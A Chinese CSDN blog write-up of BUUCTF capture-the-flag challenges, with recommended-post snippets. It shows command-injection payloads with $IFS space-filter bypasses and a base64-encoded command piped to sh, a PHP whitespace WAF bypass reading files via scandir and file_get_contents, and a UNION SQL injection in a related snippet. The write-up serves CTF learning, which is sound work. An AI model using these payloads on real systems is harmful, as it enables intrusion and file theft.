BUUCTF-Writeup2

最新推荐文章于 2024-04-10 19:26:25 发布
最新推荐文章于 2024-04-10 19:26:25 发布
阅读量221 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46263419/article/details/108918340
版权

BUUCTF-Writeup2

1.[GXYCTF2019]Ping Ping Ping

拿到题目后根据提示随便ping一下在这里插入图片描述看一下文件信息
在这里插入图片描述
我们直接试着抓一下flag
/?ip=127.0.0.1|cat flag
在这里插入图片描述
应该是过滤了一些字符,过滤空格我们可以用一下方式代替

$IFS
${IFS}
$IFS$1 //$1改成$加其他数字貌似都行
< 
<> 
{cat,flag.php}  //用逗号实现了空格功能
%20 
%09

看一下index.php
在这里插入图片描述过滤了很多东西但是没过滤sh

?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

拿到flag在这里插入图片描述

2.[RoarCTF 2019]Easy Cala

F12
在这里插入图片描述提示上了waf并在calc.php中显示waf规则
在这里插入图片描述
php的解析规则,当php进行解析的时候,如果变量前面有空格,会去掉前面的空格再解析,那么我们就可以利用这个特点绕过waf。

如果waf不允许传递num变量,我们在前面加一个空格,我们的变量就不是“num”而是“ num”,但是在php解析的时候会把空格解析掉,这样我们的代码可以正常运行还上传了非法字符
首先我们要先扫根目录下的所有文件

? num=1;var_dump(scandir(chr(47)))

找到flag文件位置
读取即可

calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

3.[ACTF2020 新生赛]BackupFile

根据提示下载备份文件
/index.php.bak
在这里插入图片描述读代码发现是php弱类型比较
get key=123即可
在这里插入图片描述

4.金三胖

逐帧查看gif即可

5.二维码

扫描二维码并没有得到flag,更改后缀为zip暴力破解四位密码即可

耀灵.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF-WriteUp
鱼的博客
02-01 695
title: BUUCTF WriteUp date: 2021-01-16 17:44:59 tags: CTF WriteUP WEB [HCTF 2018]WarmUp 启动环境,打开网址是一张滑稽,没什么用,看一下源码,发现有注释。 访问source.php,直接给了源码,进行代码审计。 分两块,第一块是emmm::checkFile,里面做了一些判断。 第二块是一个include,文件包含,我们要绕过验证,也就是上面的checkFile方法。 hint.php include触发的三个判断.
BUUCTF笔记之Web系列部分WriteUp(一)
克格莫
04-29 911
1、[极客大挑战 2019]EasySQL
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 7471
BUUCTF题目Misc部分wp(持续更新)
BUUCTF Web】WriteUp超详细,10年阿里开发架构师经验分享
最新发布
2401_84248681的博客
04-10 391
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
BUUCTF笔记之Misc系列部分WriteUp(一)
克格莫
05-24 2366
话说misc系列可以说是调剂放松了,web和crypto做吐了,就来做点简单的misc放松一下。 1.N种方法解决 乍一看以为真是个exe,我还拖进IDA看了一波,结果还是吃了没见识的亏,后来IDA无果,拖进winhex看发现是一个图片文件。。。 重命名为jpg打开无果,发现文件头后面有个base64,看看文件末尾有等于号,那把中间这一大坨拿出来解码试试: 解码出来提示是png了,那把它解码之后的数据转成图片: 扫码得到flag。 ...
BUUCTF笔记之Crypto部分WriteUp(一)
克格莫
05-08 1306
1、RSA1 直接上代码: import gmpy2 as gp p = 8637633767257008567099653486541091171320491509433615447539162437911244175885667806398411790524083553445158113502227745206205327690939504032994699902053229 q = 12640674973996472769176047937170883420927050821480010581
BUUCTF Crypto [变异凯撒]writeup题解
qq_44611153的博客
06-27 425
观察密文发现其是由大小写字母和符号组成,基本可以确定是ASCII编码,然后对应明文的格式是以“flag”开头,由于是凯撒密码,可以先用前四位和密文进行对比计算出偏移量再对密文所有进行解密。根据前四位的对比可以发现其不是普通的凯撒密码,其偏移量与其位数有关,根据前四位总结出规律为:后面第n位的偏移量也是这样公差为1的等差数列。“f”和”a”在ASCII表中相差5位;“l”和”f”在ASCII表中相差6位;“a”和”Z”在ASCII表中相差7位;“g”和”_”在ASCII表中相差9位;
leetcode不会-LC-Writeup:LC-Writeup
06-30
不会LC-Writeup 问题:未交叉的线, 方法:自顶向下的动态规划 直觉: 让A和B成为我们的两个整数数组。 假设我们想在子数组A[0...i]和B[0...j] (包括两端)中找到最大数量的未交叉线。 如果子数组共享相同的最后一...
morpheme-ordering-writeup
03-20
总的来说,"morpheme-ordering-writeup"是一个关于语素排序的研究工作,可能包括理论分析、算法设计、实验验证等多个方面,使用TeX/LaTeX进行排版,通过"morpheme-ordering-writeup-master"的压缩包我们可以获取到...
Prediction-Assignment-Writeup
03-18
9. **代码组织**: "Prediction-Assignment-Writeup-main"可能包含了一个结构化的代码目录,包括数据读取脚本、预处理函数、模型训练代码、结果评估和可视化代码等,体现了良好的编程实践。 10. **报告撰写**: 数据...
Systems-Administration-Writeup
03-17
在“Systems-Administration-Writeup-main”这个文件中,可能会详细讲解这些概念和技巧,包括如何监控系统、管理日志、设置别名以及有效利用VIM进行文本编辑。通过学习这些内容,你可以增强自己的系统管理能力,更好...
Pyre-Writeup
03-28
Pyre-Writeup 目录 分析 问题 当前的Python生态系统拥有各种各样的Web服务器和框架,使其成为该生态系统中的关键角色之一。 但是,大多数服务器开始遇到以下问题: 吞吐量和延迟均变慢 不安全的 不够坚固 较高连接...
BUUCTF Crypto [大帝的密码武器] writeup题解
qq_44611153的博客
06-27 252
然后对密文ComeChina用密钥13进行解密如果超出z就减去26让其回到A-z范围内即可得到答案。观察所有数据,发现单词security是有特殊含义的,这样就得到密钥为13。
buuctf-misc writeup (持续更新)
dameow的博客
01-07 418
内存取证三项 文件下载解压,有几个提示信息。 volatility直接梭。 查看镜像信息imageinfo。此命令用于查看镜像的大概系统,便于执行对应的命令。 查看执行过的cmd命令cmdscan。 从这里可以到小黑在小白的电脑执行了nc,并传送一个zip文件。应该就是题目的机密文件。而且猜测压缩包有密码,对应题目的小白的密码。 还有一个信息就是小黑在小白的桌面写了点什么,以为在桌面会有txt文件。文件扫描filescan。 并不是,桌面啥也没有,txt也没有。没思路的时候
Bugku CTF-Misc部分习题Write Up
soul_in_umbrella的博客
03-14 130
作者还是CTF菜鸟,为了学习写一写Write up,还望各位大佬指教。
BUUCTF web writeup
热门推荐
stepone4ward的博客
09-11 2万+
buuctf题目的部分writeup,持续更新中
buuctf-misc】--writeup
hello word的博客
01-06 2472
藏藏藏 binwalk查看隐藏文件: 有一个zip文件,分离:foremost 压缩包里有个福利.docx,扫描获得flag。 ezmisc 更改图片的高度即可。 把MRCTF换成flag提交。 你有没有好好看网课? 给了两个加密的zip,flag2.zip,flag3.zip flag2解密不出来,flag3可以跑出来。 flag3解密出来是一个docx和一个mp4。 flag3应该就是找到flag2的密码的关键。 然而,520711
buuctf lovesql
08-10
BUUCTF爱SQL(LoveSQL)是一个CTF竞赛中的SQL注入题目。根据引用和引用的描述,该题目涉及到了SQL注入漏洞,其中表名是l0ve1ysq1。为了解题,可以通过在URL中注入一些SQL语句来获取相关信息。其中,通过注入以下语句可以爆出表的列名: /check.php?username= 1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' #&password=1 [1 [3] 这样可以获取到l0ve1ysq1表的列名。进一步的解题过程包括读取表中的内容以及获得flag。具体的解题步骤和细节可以参考引用中的描述。123 #### 引用[.reference_title] - *1* *2* *3* [【BUUCTF】[极客大挑战 2019]LoveSQL 详细题解总结笔记 Writeup](https://blog.csdn.net/vanarrow/article/details/107991185)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值